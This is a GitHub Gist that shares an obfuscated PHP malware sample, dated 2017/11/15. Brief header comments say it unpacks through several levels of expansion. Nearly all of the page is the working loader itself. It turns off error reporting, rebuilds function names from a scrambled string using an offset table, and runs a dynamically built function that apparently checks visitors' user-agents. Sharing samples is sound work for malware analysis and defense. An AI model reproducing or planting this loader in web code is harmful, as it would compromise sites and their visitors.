-
-
Save robbat2/f3e62e360f7eb1dab1a02c1e535039b8 to your computer and use it in GitHub Desktop.
PHP malware sample 2017/11/15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This is a sample of PHP malware discovered 2017/11/15. | |
# Unpacks at least 5 levels deep, including references to variables from previous levels of expansion. | |
# Also seen with other variable names and constants altered. | |
<?php $awvjtnz = 'fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojnopm3qjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA x%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]3 x74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75 156 x61"]h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!^<!Ce*[!%cIjQeTQcOc/#00o#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjws:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: x575983:48984:71]K9]77]D4]82]K6]72]K9]78]K5].;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}21]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss x5csboe))/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]7]y86]267]y74]275]y7:]268]y7f#<!%tww!>! x240w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>272qj%6<^#zsfvr# x5cq%7/6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]3 162 x65 141 x74 145 x5f 146 x772 145 x66 157 x78"))) { $oqtpxpv = " x6|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}334}472 xw6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmjgA x27doj%6< x7y]252]18y]#>q%<#762]67y]5z)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn]y6d]281Ld]245]K2]285]Ke]53Ld672]48y]#>s%<#462]47d%6|6.7eu{66~67<&w6<*&7-#o]s]! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{C#-#O#-#N#*-!%ff2-!%]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]3I7jsv%7UFH# x27rfs%6~6< x7fw*127-UVPFNJU,6<*27-SFGTOBSUO#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#)% x24- x24*<!~! x24/%t2273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]x45 116 x54"]); if ((strstr($uas," x6d 163 x69 145")) or (strstr($)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x2id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x2GMFT`QIQ&f_UTPI`QUUI&e_SEEB`jix6<C x27&6<*rfs%7-K)fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*8]225]241]334]368]322]3]364]6]283]427]36]373P6]R17,67R37,#/q%>U<#16,47R57,27Rpd%6<pd%w6Z6<.3`hA x2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!g("", $jojtdkr); $bhlpzbl();}}W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t27ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#op%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!|!*nbsbq%)32d($n)-1);} @error_reporting(0); $jojtdkr = implode(array_map("dudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{h3]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]256<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x24- x24 x5c%j^ x24- x24tvctus)% x24- x24buas," x72 166 x3a 61 x31")) or (strstr($uas!gj}1~!<2p% x7f!~!<##!>!2p%Z<^1"]=1; $uas=strtolower($_SERVER[" x48 124 x5ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{eb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~7;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x24- x24gvodujpo! x24- xSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6</ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 x24- x24<%j,,*!| x2 x2272qj%)7gj6<**2qj%)h53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]Ddbqov>*ofmy%)utjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-if((function_exists(" x6f 142 x5f 16<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5`{66~6<&/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]276197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]epdof./#@#/qp%>5h%!<*::::::-1246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA x27fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUU0~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]28yW;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}%tmw!>!#]y84]275]y83]27~!%z!>2<!gps)%j>1<%j=6[%ww)))) { $GLOBALS[" x61 156 x75 156 x65 156 x63 164 x69 157 x6e"; function dhyvbmt($n){return chr(orx27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%tmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7ww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m," x61 156 x64 162 x6f 151 x64")) or (strstr($uas," x63 150 x72 +;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;W&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fm11112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!7{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#27pd%6<pd%w6Z6<.2`hA x27pd%6<C x27p157 x6d 145")) or (strstr($uas," x66 151 xw)##Qtjw)#]82#-#!#-%tmw)%t#W~!Ydrr)%rxB%epnbss!>!bssb2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")));$bhlpzbl = $oqtpxpv]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>! x+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GB)fubfsdXA x27K6< x7fw6*3qj%7><+{e%+*!*+fepdfe{h+{d%)+opj/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b% x7f!<X>b66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#r# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:npd#)tutjyf`opjudovg x22)24y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpgh1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*C1/35.)1/14+9**-)1/2986+7**^c%j:^<!%w` x5c^>Ew:Qb:Qc:W24<!%ff2!>!bssbz) x24]25 x24- x24-!% x24- x24*!|! x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`62]38y]572]48y]#>m%:j!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%g)!gj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V x27{f4 120 x5f 125 x53 105 x52 137 x41 107 24<!fwbm)%tjw)bssbz)#P#-#Q#-#Bhyvbmt",str_split("%tjw!>!#]y847,*d x27,*c x27,*b x27)fepdof.)f3ldfidk!~!<**qp%!-uyfu%)3of)fepdof`5<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)lhA!osvufs!~<3,j%>j%!*3! 248L3P6L1M5]D2P4]D6#<%G7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSopxkrbc'; $vgkbclh=explode(chr((636-516)),substr($awvjtnz,(29027-23007),(198-164))); $jdxccsyh = $vgkbclh[0]($vgkbclh[(7-6)]); $nkttprcq = $vgkbclh[0]($vgkbclh[(7-5)]); if (!function_exists('huqbsiykq')) { function huqbsiykq($ewjaowa, $ppcmgty,$euscsfo) { $rputetgcppb = NULL; for($blvfkqsfhf=0;$blvfkqsfhf<(sizeof($ewjaowa)/2);$blvfkqsfhf++) { $rputetgcppb .= substr($ppcmgty, $ewjaowa[($blvfkqsfhf*2)],$ewjaowa[($blvfkqsfhf*2)+(7-6)]); } return $euscsfo(chr((34-25)),chr((531-439)),$rputetgcppb); }; } $xozybdtes = explode(chr((213-169)),'3371,36,157,63,3931,36,2709,44,5708,38,1659,66,2636,43,4231,64,4563,42,868,40,836,32,3967,62,2332,63,5776,31,4847,58,3660,52,2063,20,4528,35,1170,29,5409,38,4365,58,1914,22,3712,42,1474,28,2555,41,5552,35,4949,31,3260,23,53,43,780,24,5965,55,5180,40,3407,49,970,62,1936,50,1791,45,1502,28,3132,66,4713,35,4748,34,3820,62,501,42,4295,70,220,37,1264,64,5918,24,4029,58,2990,53,5875,43,3315,56,640,45,2440,66,5283,25,2679,30,2083,33,5607,55,1836,50,5807,32,3631,29,4423,59,5007,45,0,53,2883,54,4905,44,1886,28,5052,69,2270,62,5839,36,2208,62,280,55,2753,70,2823,60,5351,58,4980,27,2395,45,5662,46,4087,59,2033,30,5121,59,1725,66,3043,67,4482,46,605,35,3882,23,2506,49,685,44,3754,66,4198,33,96,61,1150,20,1032,25,5587,20,908,62,5500,52,2596,40,335,57,3198,62,3110,22,5308,43,1581,24,729,51,1199,65,257,23,4631,27,1057,64,2937,53,2145,63,4605,26,4146,52,3567,64,5220,63,459,42,3283,32,804,32,1605,54,5942,23,1121,29,1348,61,3510,57,1986,47,1409,65,543,62,5447,27,3456,54,392,67,5474,26,3905,26,4658,55,5746,30,1530,51,1328,20,4782,65,2116,29'); $ympifwn = $jdxccsyh("",huqbsiykq($xozybdtes,$awvjtnz,$nkttprcq)); $jdxccsyh=$awvjtnz; $ympifwn(""); $ympifwn=(599-478); $awvjtnz=$ympifwn-1; ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment